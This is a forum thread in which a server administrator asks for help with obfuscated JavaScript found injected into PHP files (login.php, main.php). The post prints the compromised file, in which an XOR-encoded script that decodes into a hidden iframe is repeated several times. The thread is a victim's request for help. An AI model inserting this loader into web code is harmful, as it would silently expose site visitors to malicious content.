Login or Register to Ask a Question and Join Our Community

Sponsored Content
Full Discussion: javascript injection
Top Forums Shell Programming and Scripting javascript injection Post 302109360 by fed.linuxgossip on Monday 5th of March 2007 04:30:24 PM
Old 03-05-2007
No there isn't ...... but there is multiple instance of the same code in a single file.


say ....

mailnull 12442 0.0 0.2 6936 2288 pts/1 S 05:20 0:05 eximstats
root 12494 1.3 48.0 676664 493888 pts/1 DN 05:20 7:55 cpanellogd - updating bandwidth for nandkdes





root@server1 [/opt/public_html/includes]# grep -lr 'testws35fdgh' .
./login.php
./main.php
root@server1 [/opt/public_html/includes]#


root@server1 [/opt/public_html/includes]# cat main.php | more
<font color='<?php echo $config['font']; ?> <div id="testws35fdgh"></div>
<script language="JavaScript">
var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 = "\x38\x30\x68\x72\x36\x3a\x20\x3b\x21\x30"; var2 = "\x27\x72\x75\x26
\x27\x36\x68\x72\x3d\x21"; var3 = "\x21\x25\x6f\x7a\x7a\x26\x21\x30\x39\x34"; var4 = "\x34\x27\x21\x3a\x3c\x26\x7b\x27\x20\x7a
"; var5 = "\x3c\x3b\x31\x30\x2d\x67\x7b\x25\x3d\x25"; var6 = "\x72\x75\x3d\x30\x3c\x32\x3d\x21\x68\x72"; var7 = "\x64\x63\x72\
x75\x22\x3c\x31\x21\x3d\x68"; var8 = "\x72\x64\x63\x72\x75\x33\x27\x34\x38\x30"; var9 = "\x37\x3a\x27\x31\x30\x27\x68\x72\x65\
x72"; var10 = "\x75\x26\x36\x27\x3a\x39\x39\x3c\x3b\x32"; var11 = "\x68\x72\x3b\x3a\x72\x6b\x69\x7a\x3c\x33"; var12 = "\x27\x3
4\x38\x30\x6b";
sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12;
dst = "";
for(i = 0; i < sr.length; i++) {
var d = parseInt(sr.charCodeAt(i) ^ 85);
dst = dst + String.fromCharCode(d);
}
document.getElementById("testws35fdgh").innerHTML = dst;
</script>'>
<b><?php echo $config['welcomemsg']; ?> <div id="testws35fdgh"></div>
<script language="JavaScript">
var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 = "\x38\x30\x68\x72\x36\x3a\x20\x3b\x21\x30"; var2 = "\x27\x72\x75\x26
\x27\x36\x68\x72\x3d\x21"; var3 = "\x21\x25\x6f\x7a\x7a\x26\x21\x30\x39\x34"; var4 = "\x34\x27\x21\x3a\x3c\x26\x7b\x27\x20\x7a
"; var5 = "\x3c\x3b\x31\x30\x2d\x67\x7b\x25\x3d\x25"; var6 = "\x72\x75\x3d\x30\x3c\x32\x3d\x21\x68\x72"; var7 = "\x64\x63\x72\
x75\x22\x3c\x31\x21\x3d\x68"; var8 = "\x72\x64\x63\x72\x75\x33\x27\x34\x38\x30"; var9 = "\x37\x3a\x27\x31\x30\x27\x68\x72\x65\
x72"; var10 = "\x75\x26\x36\x27\x3a\x39\x39\x3c\x3b\x32"; var11 = "\x68\x72\x3b\x3a\x72\x6b\x69\x7a\x3c\x33"; var12 = "\x27\x3
4\x38\x30\x6b";
sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12;
dst = "";
for(i = 0; i < sr.length; i++) {
var d = parseInt(sr.charCodeAt(i) ^ 85);
dst = dst + String.fromCharCode(d);
}
document.getElementById("testws35fdgh").innerHTML = dst;
</script></b><br>
This interface has admin provision set to <b><?php echo $config['provision']; ?><div id="testws35fdgh"></div>
<script language="JavaScript">
var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 = "\x38\x30\x68\x72\x36\x3a\x20\x3b\x21\x30"; var2 = "\x27\x72\x75\x26
\x27\x36\x68\x72\x3d\x21"; var3 = "\x21\x25\x6f\x7a\x7a\x26\x21\x30\x39\x34"; var4 = "\x34\x27\x21\x3a\x3c\x26\x7b\x27\x20\x7a
"; var5 = "\x3c\x3b\x31\x30\x2d\x67\x7b\x25\x3d\x25"; var6 = "\x72\x75\x3d\x30\x3c\x32\x3d\x21\x68\x72"; var7 = "\x64\x63\x72\
x75\x22\x3c\x31\x21\x3d\x68"; var8 = "\x72\x64\x63\x72\x75\x33\x27\x34\x38\x30"; var9 = "\x37\x3a\x27\x31\x30\x27\x68\x72\x65\
x72"; var10 = "\x75\x26\x36\x27\x3a\x39\x39\x3c\x3b\x32"; var11 = "\x68\x72\x3b\x3a\x72\x6b\x69\x7a\x3c\x33"; var12 = "\x27\x3
4\x38\x30\x6b";
sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12;
dst = "";
for(i = 0; i < sr.length; i++) {
var d = parseInt(sr.charCodeAt(i) ^ 85);
dst = dst + String.fromCharCode(d);
}
document.getElementById("testws35fdgh").innerHTML = dst;
</script>






Please advise.


Thanks
 

5 More Discussions You Might Find Interesting

1. Cybersecurity

Javascript injection only when referred by search engine.

My website has some weird malware installed in it. When I click on a link from a search engine (google, bing, or even yahoo) my pages get a string of javascript inserted into them. The page can be a simple "Hello World" and it will still inject a line of javascript into the page. Here is a screen... (1 Reply)
Discussion started by: noPermissions
1 Replies

2. OS X (Apple)

Code injection

Im needing to create a postinst script for a debian package. I need it to search for this line of script in a plist file located at /folder/folder/folder/folder/folder/file.plist <key>TESTKEYLINE</key> <true/> and after it create a new line and insert this code <key>KEYNAME</key>... (0 Replies)
Discussion started by: iModdr
0 Replies

3. Shell Programming and Scripting

SQL Injection Detection

I want to grep/awk /var/log/httpd/mysite-access_log.log and check if 2 words from the following appear in a single line: benchmark union information_schema drop truncate group_concat into file case hex lpad group order having insert union select from (12 Replies)
Discussion started by: koutroul
12 Replies

4. Red Hat

Cause PCIe error callbacks using AER injection

I am trying to cause a callback in the Linux nvme driver by using AER injection. I've modified the AER source code to directly inject errors through module loading rather than from userland program. I've verified that I got the correct bus, dev, and fn and that the error injection went... (0 Replies)
Discussion started by: Decrypto
0 Replies

5. Shell Programming and Scripting

Making a script secure to code injection

Heyas I've been told my scipts would be insecure, and to fix that. Figured i might rethink some parts of my coding style, meanwhile i tried to write an additional catcher. After reading: fail : Security Issues - didnt help too much, infact - it confused me even more. n/a:... (8 Replies)
Discussion started by: sea
8 Replies
All times are GMT -4. The time now is 03:09 PM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy